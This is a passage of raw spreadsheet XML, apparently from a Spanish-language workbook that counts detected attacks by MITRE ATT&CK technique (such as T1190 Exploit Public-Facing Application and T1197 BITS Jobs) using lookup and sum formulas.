  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E33" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F33" s="579" t="str">
        <f t="shared" si="4"/>
        <v>2 (5)</v>
      </c>
      <c r="G33" s="292"/>
      <c r="H33" s="322"/>
      <c r="I33" s="322"/>
      <c r="J33" s="12"/>
      <c r="K33" s="13"/>
      <c r="L33" s="394"/>
      <c r="M33" s="322"/>
      <c r="N33" s="322"/>
      <c r="O33" s="322"/>
      <c r="P33" s="12"/>
      <c r="Q33" s="13"/>
      <c r="R33" s="394"/>
      <c r="S33" s="292"/>
      <c r="T33" s="322"/>
      <c r="U33" s="322"/>
      <c r="V33" s="12"/>
      <c r="W33" s="13"/>
      <c r="X33" s="394"/>
      <c r="Y33" s="392"/>
      <c r="Z33" s="392"/>
      <c r="AA33" s="322"/>
      <c r="AB33" s="392"/>
      <c r="AC33" s="16"/>
      <c r="AD33" s="394"/>
      <c r="AE33" s="392"/>
      <c r="AF33" s="392"/>
      <c r="AG33" s="322"/>
      <c r="AH33" s="392"/>
      <c r="AI33" s="16"/>
      <c r="AJ33" s="394"/>
      <c r="AK33" s="392"/>
      <c r="AL33" s="392"/>
      <c r="AM33" s="322"/>
      <c r="AN33" s="392"/>
      <c r="AO33" s="16"/>
      <c r="AP33" s="394"/>
      <c r="AQ33" s="292"/>
      <c r="AR33" s="322"/>
      <c r="AS33" s="322"/>
      <c r="AT33" s="12"/>
      <c r="AU33" s="13"/>
      <c r="AV33" s="394"/>
      <c r="AW33" s="392"/>
      <c r="AX33" s="392"/>
      <c r="AY33" s="322"/>
      <c r="BA33" s="16"/>
      <c r="BB33" s="394"/>
      <c r="BC33" s="292"/>
      <c r="BD33" s="322"/>
      <c r="BE33" s="322"/>
      <c r="BF33" s="12"/>
      <c r="BG33" s="13"/>
      <c r="BH33" s="394"/>
      <c r="BI33" s="292">
        <v>0</v>
      </c>
      <c r="BJ33" s="322">
        <v>0</v>
      </c>
      <c r="BK33" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL33" s="12">
        <v>0</v>
      </c>
      <c r="BM33" s="13">
        <v>0</v>
      </c>
      <c r="BN33" s="394">
        <v>0</v>
      </c>
      <c r="BO33" s="292">
        <v>5</v>
      </c>
      <c r="BP33" s="322">
        <v>5</v>
      </c>
      <c r="BQ33" s="322" t="str">
        <f t="shared" si="1"/>
        <v>5 (5)</v>
      </c>
      <c r="BR33" s="12">
        <v>0</v>
      </c>
      <c r="BS33" s="12">
        <v>2</v>
      </c>
      <c r="BT33" s="13">
        <v>1</v>
      </c>
      <c r="BU33" s="394">
        <v>5</v>
      </c>
      <c r="BV33" s="292">
        <v>0</v>
      </c>
      <c r="BW33" s="322">
        <v>0</v>
      </c>
      <c r="BX33" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY33" s="12">
        <v>0</v>
      </c>
      <c r="BZ33" s="13">
        <v>0</v>
      </c>
      <c r="CA33" s="394">
        <v>0</v>
      </c>
      <c r="CB33" s="292">
        <v>0</v>
      </c>
      <c r="CC33" s="322">
        <v>0</v>
      </c>
      <c r="CD33" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE33" s="12">
        <v>0</v>
      </c>
      <c r="CF33" s="12">
        <v>0</v>
      </c>
      <c r="CG33" s="13">
        <v>0</v>
      </c>
      <c r="CH33" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:86" ht="15" customHeight="1">
      <c r="A34" s="4">
        <f t="shared" si="3"/>
        <v>32</v>
      </c>
      <c r="B34" s="4" t="str">
        <f>IFERROR(VLOOKUP(A34,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1190</v>
      </c>
      <c r="C34" s="493" t="str">
        <f>IFERROR(VLOOKUP(B34,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="D34" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B34)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>5</v>
      </c>
      <c r="E34" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>130</v>
      </c>
      <c r="F34" s="579" t="str">
        <f t="shared" si="4"/>
        <v>5 (130)</v>
      </c>
      <c r="G34" s="292"/>
      <c r="H34" s="322"/>
      <c r="I34" s="322"/>
      <c r="J34" s="12"/>
      <c r="K34" s="13"/>
      <c r="L34" s="394"/>
      <c r="M34" s="322"/>
      <c r="N34" s="322"/>
      <c r="O34" s="322"/>
      <c r="P34" s="12"/>
      <c r="Q34" s="13"/>
      <c r="R34" s="394"/>
      <c r="S34" s="292"/>
      <c r="T34" s="322"/>
      <c r="U34" s="322"/>
      <c r="V34" s="12"/>
      <c r="W34" s="13"/>
      <c r="X34" s="394"/>
      <c r="Y34" s="392"/>
      <c r="Z34" s="392"/>
      <c r="AA34" s="322"/>
      <c r="AB34" s="392"/>
      <c r="AC34" s="16"/>
      <c r="AD34" s="394"/>
      <c r="AE34" s="392"/>
      <c r="AF34" s="392"/>
      <c r="AG34" s="322"/>
      <c r="AH34" s="392"/>
      <c r="AI34" s="16"/>
      <c r="AJ34" s="394"/>
      <c r="AK34" s="392"/>
      <c r="AL34" s="392"/>
      <c r="AM34" s="322"/>
      <c r="AN34" s="392"/>
      <c r="AO34" s="16"/>
      <c r="AP34" s="394"/>
      <c r="AQ34" s="292"/>
      <c r="AR34" s="322"/>
      <c r="AS34" s="322"/>
      <c r="AT34" s="12"/>
      <c r="AU34" s="13"/>
      <c r="AV34" s="394"/>
      <c r="AW34" s="392"/>
      <c r="AX34" s="392"/>
      <c r="AY34" s="322"/>
      <c r="BA34" s="16"/>
      <c r="BB34" s="394"/>
      <c r="BC34" s="292"/>
      <c r="BD34" s="322"/>
      <c r="BE34" s="322"/>
      <c r="BF34" s="12"/>
      <c r="BG34" s="13"/>
      <c r="BH34" s="394"/>
      <c r="BI34" s="292">
        <v>0</v>
      </c>
      <c r="BJ34" s="322">
        <v>0</v>
      </c>
      <c r="BK34" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL34" s="12">
        <v>0</v>
      </c>
      <c r="BM34" s="13">
        <v>0</v>
      </c>
      <c r="BN34" s="394">
        <v>0</v>
      </c>
      <c r="BO34" s="292">
        <v>45</v>
      </c>
      <c r="BP34" s="322">
        <v>45</v>
      </c>
      <c r="BQ34" s="322" t="str">
        <f t="shared" si="1"/>
        <v>45 (45)</v>
      </c>
      <c r="BR34" s="12">
        <v>0</v>
      </c>
      <c r="BS34" s="12">
        <v>1</v>
      </c>
      <c r="BT34" s="13">
        <v>0.4</v>
      </c>
      <c r="BU34" s="394">
        <v>45</v>
      </c>
      <c r="BV34" s="292">
        <v>0</v>
      </c>
      <c r="BW34" s="322">
        <v>0</v>
      </c>
      <c r="BX34" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY34" s="12">
        <v>0</v>
      </c>
      <c r="BZ34" s="13">
        <v>0</v>
      </c>
      <c r="CA34" s="394">
        <v>0</v>
      </c>
      <c r="CB34" s="292">
        <v>0</v>
      </c>
      <c r="CC34" s="322">
        <v>0</v>
      </c>
      <c r="CD34" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE34" s="12">
        <v>0</v>
      </c>
      <c r="CF34" s="12">
        <v>0</v>
      </c>
      <c r="CG34" s="13">
        <v>0</v>
      </c>
      <c r="CH34" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="4">
        <f t="shared" si="3"/>
        <v>33</v>
      </c>
      <c r="B35" s="4" t="str">
        <f>IFERROR(VLOOKUP(A35,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1197</v>
      </c>
      <c r="C35" s="493" t="str">
        <f>IFERROR(VLOOKUP(B35,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>BITS Jobs</v>
      </c>
      <c r="D35" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B35)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E35" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>43</v>
      </c>
      <c r="F35" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (43)</v>
      </c>
      <c r="G35" s="292"/>
      <c r="H35" s="322"/>
      <c r="I35" s="322"/>
      <c r="J35" s="12"/>
      <c r="K35" s="13"/>
      <c r="L35" s="394"/>
      <c r="M35" s="322"/>
      <c r="N35" s="322"/>
      <c r="O35" s="322"/>
      <c r="P35" s="12"/>
      <c r="Q35" s="13"/>
      <c r="R35" s="394"/>
      <c r="S35" s="292"/>
      <c r="T35" s="322"/>
      <c r="U35" s="322"/>
      <c r="V35" s="12"/>
      <c r="W35" s="13"/>
      <c r="X35" s="394"/>
      <c r="Y35" s="392"/>
      <c r="Z35" s="392"/>
      <c r="AA35" s="322"/>
      <c r="AB35" s="392"/>
      <c r="AC35" s="16"/>
      <c r="AD35" s="394"/>
      <c r="AE35" s="392"/>
      <c r="AF35" s="392"/>
      <c r="AG35" s="322"/>
      <c r="AH35" s="392"/>
      <c r="AI35" s="16"/>
      <c r="AJ35" s="394"/>
      <c r="AK35" s="392"/>
      <c r="AL35" s="392"/>
      <c r="AM35" s="322"/>
      <c r="AN35" s="392"/>
      <c r="AO35" s="16"/>
      <c r="AP35" s="394"/>
      <c r="AQ35" s="292"/>
      <c r="AR35" s="322"/>
      <c r="AS35" s="322"/>
      <c r="AT35" s="12"/>
      <c r="AU35" s="13"/>
      <c r="AV35" s="394"/>
      <c r="AW35" s="392"/>
      <c r="AX35" s="392"/>
      <c r="AY35" s="322"/>
      <c r="AZ35" s="4"/>
      <c r="BA35" s="16"/>
      <c r="BB35" s="394"/>
      <c r="BC35" s="292"/>
      <c r="BD35" s="322"/>
      <c r="BE35" s="322"/>
      <c r="BF35" s="12"/>
      <c r="BG35" s="13"/>
      <c r="BH35" s="394"/>
      <c r="BI35" s="292">
        <v>5</v>
      </c>
      <c r="BJ35" s="322">
        <v>3</v>
      </c>
      <c r="BK35" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (5)</v>
      </c>
      <c r="BL35" s="12">
        <v>2</v>
      </c>
      <c r="BM35" s="13">
        <v>1</v>
      </c>
      <c r="BN35" s="394">
        <v>2</v>
      </c>
      <c r="BO35" s="292">
        <v>24</v>
      </c>
      <c r="BP35" s="322">
        <v>18</v>
      </c>
      <c r="BQ35" s="322" t="str">
        <f t="shared" si="1"/>
        <v>18 (24)</v>
      </c>
      <c r="BR35" s="12">
        <v>2</v>
      </c>
      <c r="BS35" s="12">
        <v>6</v>
      </c>
      <c r="BT35" s="13">
        <v>1</v>
      </c>
      <c r="BU35" s="394">
        <v>17</v>
      </c>
      <c r="BV35" s="292">
        <v>0</v>
      </c>
      <c r="BW35" s="322">
        <v>0</v>
      </c>
      <c r="BX35" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY35" s="12">
        <v>0</v>
      </c>
      <c r="BZ35" s="13">
        <v>0</v>
      </c>
      <c r="CA35" s="394">
        <v>0</v>
      </c>
      <c r="CB35" s="292">
        <v>0</v>
      </c>
      <c r="CC35" s="322">
        <v>0</v>
      </c>
      <c r="CD35" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE35" s="12">
        <v>0</v>
      </c>
      <c r="CF35" s="12">
        <v>0</v>
      </c>
      <c r="CG35" s="13">
        <v>0</v>
      </c>
      <c r="CH35" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="4">
        <f t="shared" si="3"/>
        <v>34</v>
      </c>
      <c r="B36" s="4" t="str">
        <f>IFERROR(VLOOKUP(A36,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1199</v>
      </c>
      <c r="C36" s="493" t="str">
        <f>IFERROR(VLOOKUP(B36,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="D36" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B36)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E36" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>18</v>
      </c>
      <c r="F36" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (18)</v>
      </c>
      <c r="G36" s="292"/>
      <c r="H36" s="322"/>
      <c r="I36" s="322"/>
      <c r="J36" s="12"/>
      <c r="K36" s="13"/>
      <c r="L36" s="394"/>
      <c r="M36" s="322"/>
      <c r="N36" s="322"/>
      <c r="O36" s="322"/>
      <c r="P36" s="12"/>
      <c r="Q36" s="13"/>
      <c r="R36" s="394"/>
      <c r="S36" s="292"/>
      <c r="T36" s="322"/>
      <c r="U36" s="322"/>
      <c r="V36" s="12"/>
      <c r="W36" s="13"/>
      <c r="X36" s="394"/>
      <c r="Y36" s="392"/>
      <c r="Z36" s="392"/>
      <c r="AA36" s="322"/>
      <c r="AB36" s="392"/>
      <c r="AC36" s="16"/>
      <c r="AD36" s="394"/>
      <c r="AE36" s="392"/>
      <c r="AF36" s="392"/>
      <c r="AG36" s="322"/>
      <c r="AH36" s="392"/>
      <c r="AI36" s="16"/>
      <c r="AJ36" s="394"/>
      <c r="AK36" s="392"/>
      <c r="AL36" s="392"/>
      <c r="AM36" s="322"/>
      <c r="AN36" s="392"/>
      <c r="AO36" s="16"/>
      <c r="AP36" s="394"/>
      <c r="AQ36" s="292"/>
      <c r="AR36" s="322"/>
      <c r="AS36" s="322"/>
      <c r="AT36" s="12"/>
      <c r="AU36" s="13"/>
      <c r="AV36" s="394"/>
      <c r="AW36" s="392"/>
      <c r="AX36" s="392"/>
      <c r="AY36" s="322"/>
      <c r="AZ36" s="4"/>
      <c r="BA36" s="16"/>
      <c r="BB36" s="394"/>
      <c r="BC36" s="292"/>
      <c r="BD36" s="322"/>
      <c r="BE36" s="322"/>
      <c r="BF36" s="12"/>
      <c r="BG36" s="13"/>
      <c r="BH36" s="394"/>
      <c r="BI36" s="292">
        <v>0</v>
      </c>
      <c r="BJ36" s="322">
        <v>0</v>
      </c>
      <c r="BK36" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL36" s="12">
        <v>0</v>
      </c>
      <c r="BM36" s="13">
        <v>0</v>
      </c>
      <c r="BN36" s="394">
        <v>0</v>
      </c>
      <c r="BO36" s="292">
        <v>7</v>
      </c>
      <c r="BP36" s="322">
        <v>7</v>
      </c>
      <c r="BQ36" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (7)</v>
      </c>
      <c r="BR36" s="12">
        <v>0</v>
      </c>
      <c r="BS36" s="12">
        <v>3</v>
      </c>
      <c r="BT36" s="13">
        <v>1</v>
      </c>
      <c r="BU36" s="394">
        <v>7</v>
      </c>
      <c r="BV36" s="292">
        <v>0</v>
      </c>
      <c r="BW36" s="322">
        <v>0</v>
      </c>
      <c r="BX36" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY36" s="12">
        <v>0</v>
      </c>
      <c r="BZ36" s="13">
        <v>0</v>
      </c>
      <c r="CA36" s="394">
        <v>0</v>
      </c>
      <c r="CB36" s="292">
        <v>0</v>
      </c>
      <c r="CC36" s="322">
        <v>0</v>
      </c>
      <c r="CD36" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE36" s="12">
        <v>0</v>
      </c>
      <c r="CF36" s="12">
        <v>0</v>
      </c>
      <c r="CG36" s="13">
        <v>0</v>
      </c>
      <c r="CH36" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4">
        <f t="shared" si="3"/>
        <v>35</v>
      </c>
      <c r="B37" s="4" t="str">
        <f>IFERROR(VLOOKUP(A37,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1200</v>
      </c>
      <c r="C37" s="493" t="str">
        <f>IFERROR(VLOOKUP(B37,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hardware Additions</v>
      </c>
      <c r="D37" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B37)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E37" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F37" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (3)</v>
      </c>
      <c r="G37" s="292"/>
      <c r="H37" s="322"/>
      <c r="I37" s="322"/>
      <c r="J37" s="12"/>
      <c r="K37" s="13"/>
      <c r="L37" s="394"/>
      <c r="M37" s="322"/>
      <c r="N37" s="322"/>
      <c r="O37" s="322"/>
      <c r="P37" s="12"/>
      <c r="Q37" s="13"/>
      <c r="R37" s="394"/>
      <c r="S37" s="292"/>
      <c r="T37" s="322"/>
      <c r="U37" s="322"/>
      <c r="V37" s="12"/>
      <c r="W37" s="13"/>
      <c r="X37" s="394"/>
      <c r="Y37" s="392"/>
      <c r="Z37" s="392"/>
      <c r="AA37" s="322"/>
      <c r="AB37" s="392"/>
      <c r="AC37" s="16"/>
      <c r="AD37" s="394"/>
      <c r="AE37" s="392"/>
      <c r="AF37" s="392"/>
      <c r="AG37" s="322"/>
      <c r="AH37" s="392"/>
      <c r="AI37" s="16"/>
      <c r="AJ37" s="394"/>
      <c r="AK37" s="392"/>
      <c r="AL37" s="392"/>
      <c r="AM37" s="322"/>
      <c r="AN37" s="392"/>
      <c r="AO37" s="16"/>
      <c r="AP37" s="394"/>
      <c r="AQ37" s="292"/>
      <c r="AR37" s="322"/>
      <c r="AS37" s="322"/>
      <c r="AT37" s="12"/>
      <c r="AU37" s="13"/>
      <c r="AV37" s="394"/>
      <c r="AW37" s="392"/>
      <c r="AX37" s="392"/>
      <c r="AY37" s="322"/>
      <c r="AZ37" s="4"/>
      <c r="BA37" s="16"/>
      <c r="BB37" s="394"/>
      <c r="BC37" s="292"/>
      <c r="BD37" s="322"/>
      <c r="BE37" s="322"/>
      <c r="BF37" s="12"/>
      <c r="BG37" s="13"/>
      <c r="BH37" s="394"/>
      <c r="BI37" s="292">
        <v>0</v>
      </c>
      <c r="BJ37" s="322">
        <v>0</v>
      </c>
      <c r="BK37" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL37" s="12">
        <v>0</v>
      </c>
      <c r="BM37" s="13">
        <v>0</v>
      </c>
      <c r="BN37" s="394">
        <v>0</v>
      </c>
      <c r="BO37" s="292">
        <v>3</v>
      </c>
      <c r="BP37" s="322">
        <v>3</v>
      </c>
      <c r="BQ37" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="BR37" s="12">
        <v>0</v>
      </c>
      <c r="BS37" s="12">
        <v>3</v>
      </c>
      <c r="BT37" s="13">
        <v>1</v>
      </c>
      <c r="BU37" s="394">
        <v>3</v>
      </c>
      <c r="BV37" s="292">
        <v>0</v>
      </c>
      <c r="BW37" s="322">
        <v>0</v>
      </c>
      <c r="BX37" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY37" s="12">
        <v>0</v>
      </c>
      <c r="BZ37" s="13">
        <v>0</v>
      </c>
      <c r="CA37" s="394">
        <v>0</v>
      </c>
      <c r="CB37" s="292">
        <v>0</v>
      </c>
      <c r="CC37" s="322">
        <v>0</v>
      </c>
      <c r="CD37" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE37" s="12">
        <v>0</v>
      </c>
      <c r="CF37" s="12">
        <v>0</v>
      </c>
      <c r="CG37" s="13">
        <v>0</v>
      </c>
      <c r="CH37" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="4">
        <f t="shared" si="3"/>
        <v>36</v>
      </c>
      <c r="B38" s="4" t="str">
        <f>IFERROR(VLOOKUP(A38,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1203</v>
      </c>
      <c r="C38" s="493" t="str">
        <f>IFERROR(VLOOKUP(B38,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="D38" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B38)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E38" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>116</v>
      </c>
      <c r="F38" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (116)</v>
      </c>
      <c r="G38" s="292"/>
      <c r="H38" s="322"/>
      <c r="I38" s="322"/>
      <c r="J38" s="12"/>
      <c r="K38" s="13"/>
      <c r="L38" s="394"/>
      <c r="M38" s="322"/>
      <c r="N38" s="322"/>
      <c r="O38" s="322"/>
      <c r="P38" s="12"/>
      <c r="Q38" s="13"/>
      <c r="R38" s="394"/>
      <c r="S38" s="292"/>
      <c r="T38" s="322"/>
      <c r="U38" s="322"/>
      <c r="V38" s="12"/>
      <c r="W38" s="13"/>
      <c r="X38" s="394"/>
      <c r="Y38" s="392"/>
      <c r="Z38" s="392"/>
      <c r="AA38" s="322"/>
      <c r="AB38" s="392"/>
      <c r="AC38" s="16"/>
      <c r="AD38" s="394"/>
      <c r="AE38" s="392"/>
      <c r="AF38" s="392"/>
      <c r="AG38" s="322"/>
      <c r="AH38" s="392"/>
      <c r="AI38" s="16"/>
      <c r="AJ38" s="394"/>
      <c r="AK38" s="392"/>
      <c r="AL38" s="392"/>
      <c r="AM38" s="322"/>
      <c r="AN38" s="392"/>
      <c r="AO38" s="16"/>
      <c r="AP38" s="394"/>
      <c r="AQ38" s="292"/>
      <c r="AR38" s="322"/>
      <c r="AS38" s="322"/>
      <c r="AT38" s="12"/>
      <c r="AU38" s="13"/>
      <c r="AV38" s="394"/>
      <c r="AW38" s="392"/>
      <c r="AX38" s="392"/>
      <c r="AY38" s="322"/>
      <c r="AZ38" s="4"/>
      <c r="BA38" s="16"/>
      <c r="BB38" s="394"/>
      <c r="BC38" s="292"/>
      <c r="BD38" s="322"/>
      <c r="BE38" s="322"/>
      <c r="BF38" s="12"/>
      <c r="BG38" s="13"/>
      <c r="BH38" s="394"/>
      <c r="BI38" s="292">
        <v>0</v>
      </c>
      <c r="BJ38" s="322">
        <v>0</v>
      </c>
      <c r="BK38" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL38" s="12">
        <v>0</v>
      </c>
      <c r="BM38" s="13">
        <v>0</v>
      </c>
      <c r="BN38" s="394">
        <v>0</v>
      </c>
      <c r="BO38" s="292">
        <v>115</v>
      </c>
      <c r="BP38" s="322">
        <v>115</v>
      </c>
      <c r="BQ38" s="322" t="str">
        <f t="shared" si="1"/>
        <v>115 (115)</v>
      </c>
      <c r="BR38" s="12">
        <v>0</v>
      </c>
      <c r="BS38" s="12">
        <v>1</v>
      </c>
      <c r="BT38" s="13">
        <v>1</v>
      </c>
      <c r="BU38" s="394">
        <v>115</v>
      </c>
      <c r="BV38" s="292">
        <v>0</v>
      </c>
      <c r="BW38" s="322">
        <v>0</v>
      </c>
      <c r="BX38" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY38" s="12">
        <v>0</v>
      </c>
      <c r="BZ38" s="13">
        <v>0</v>
      </c>
      <c r="CA38" s="394">
        <v>0</v>
      </c>
      <c r="CB38" s="292">
        <v>0</v>
      </c>
      <c r="CC38" s="322">
        <v>0</v>
      </c>
      <c r="CD38" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE38" s="12">
        <v>0</v>
      </c>
      <c r="CF38" s="12">
        <v>0</v>
      </c>
      <c r="CG38" s="13">
        <v>0</v>
      </c>
      <c r="CH38" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4">
        <f t="shared" si="3"/>
        <v>37</v>
      </c>
      <c r="B39" s="4" t="str">
        <f>IFERROR(VLOOKUP(A39,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1204</v>
      </c>
      <c r="C39" s="493" t="str">
        <f>IFERROR(VLOOKUP(B39,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>User Execution</v>
      </c>
      <c r="D39" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B39)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E39" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F39" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G39" s="292"/>
      <c r="H39" s="322"/>
      <c r="I39" s="322"/>
      <c r="J39" s="12"/>
      <c r="K39" s="13"/>
      <c r="L39" s="394"/>
      <c r="M39" s="322"/>
      <c r="N39" s="322"/>
      <c r="O39" s="322"/>
      <c r="P39" s="12"/>
      <c r="Q39" s="13"/>
      <c r="R39" s="394"/>
      <c r="S39" s="292"/>
      <c r="T39" s="322"/>
      <c r="U39" s="322"/>
      <c r="V39" s="12"/>
      <c r="W39" s="13"/>
      <c r="X39" s="394"/>
      <c r="Y39" s="392"/>
      <c r="Z39" s="392"/>
      <c r="AA39" s="322"/>
      <c r="AB39" s="392"/>
      <c r="AC39" s="16"/>
      <c r="AD39" s="394"/>
      <c r="AE39" s="392"/>
      <c r="AF39" s="392"/>
      <c r="AG39" s="322"/>
      <c r="AH39" s="392"/>
      <c r="AI39" s="16"/>
      <c r="AJ39" s="394"/>
      <c r="AK39" s="392"/>
      <c r="AL39" s="392"/>
      <c r="AM39" s="322"/>
      <c r="AN39" s="392"/>
      <c r="AO39" s="16"/>
      <c r="AP39" s="394"/>
      <c r="AQ39" s="292"/>
      <c r="AR39" s="322"/>
      <c r="AS39" s="322"/>
      <c r="AT39" s="12"/>
      <c r="AU39" s="13"/>
      <c r="AV39" s="394"/>
      <c r="AW39" s="392"/>
      <c r="AX39" s="392"/>
      <c r="AY39" s="322"/>
      <c r="AZ39" s="4"/>
      <c r="BA39" s="16"/>
      <c r="BB39" s="394"/>
      <c r="BC39" s="292"/>
      <c r="BD39" s="322"/>
      <c r="BE39" s="322"/>
      <c r="BF39" s="12"/>
      <c r="BG39" s="13"/>
      <c r="BH39" s="394"/>
      <c r="BI39" s="292">
        <v>0</v>
      </c>
      <c r="BJ39" s="322">
        <v>0</v>
      </c>
      <c r="BK39" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL39" s="12">
        <v>0</v>
      </c>
      <c r="BM39" s="13">
        <v>0</v>
      </c>
      <c r="BN39" s="394">
        <v>0</v>
      </c>
      <c r="BO39" s="292">
        <v>0</v>
      </c>
      <c r="BP39" s="322">
        <v>0</v>
      </c>
      <c r="BQ39" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="BR39" s="12">
        <v>0</v>
      </c>
      <c r="BS39" s="12">
        <v>0</v>
      </c>
      <c r="BT39" s="13">
        <v>0</v>
      </c>
      <c r="BU39" s="394">
        <v>0</v>
      </c>
      <c r="BV39" s="292">
        <v>0</v>
      </c>
      <c r="BW39" s="322">
        <v>0</v>
      </c>
      <c r="BX39" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY39" s="12">
        <v>0</v>
      </c>
      <c r="BZ39" s="13">
        <v>0</v>
